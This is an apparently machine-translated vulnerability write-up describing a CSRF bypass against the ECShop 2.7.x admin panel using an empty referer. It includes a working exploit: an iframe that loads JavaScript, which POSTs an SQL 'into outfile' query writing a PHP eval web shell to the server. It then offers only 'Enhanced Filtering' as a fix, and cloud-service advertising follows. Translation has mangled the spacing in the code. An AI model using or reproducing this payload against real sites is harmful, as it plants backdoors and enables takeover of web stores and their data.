Ecshop csrf defense bypasses the background sensitive function csrf getshell
Supports csrf to execute various background sensitive functions. The analysis here is to use the empty referer method to bypass.
This bypass can be used to implement csrf getshell and csrf dump databases of various ecshop versions. A version of 2.7.3 and the latest version of 2.7.4 are tested.
This article can be seen as a one-stop test of this post at http://zone.wooyun.org/content/744. Thank you for sharing the technology.
Exp1 and csrf getshell use the SQL Execution interface and report the PATH Vulnerability.
The content of the newly created html file is:
<iframe src="javascript:'<script src=http://127.0.0.1/ecshop2.7.4/csrf.js></script>'"></iframe>
Create an http: // 127.0.0.1/ecshop2.7.4/csrf. js file. Content:
Var url = "http: // 127.0.0.1/ecshop2.7.4/admin/SQL. php "; var sendata = "SQL = select + % 22% 3C % 3 Fphp + % 40 eval % 28% 24_POST % 5B % 27c % 27% 5D % 29% 3B % 3F % 3E % 22 + into + outfile + % 27C % physical path Ctestcsrf. php % 27% 3B & act = query "; if (window. XMLHttpRequest) {var xmlhttp1 = new XMLHttpRequest ();} else {var xmlhttp1 = new ActiveXObject ("Microsoft. XMLHTTP ");} xmlhttp1.open (" POST ", url, true); xmlhttp1.setRequestHeader (" Content-Type "," application/x-www-form-urlencoded "); xmlhttp1.send (sendata );
The administrator can access the link to generate the testcsrf. php file.
Here, we only use this interface as an example. A large number of interfaces in the background expose sensitive operations to the threat of csrf.
Solution:
Enhanced Filtering
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
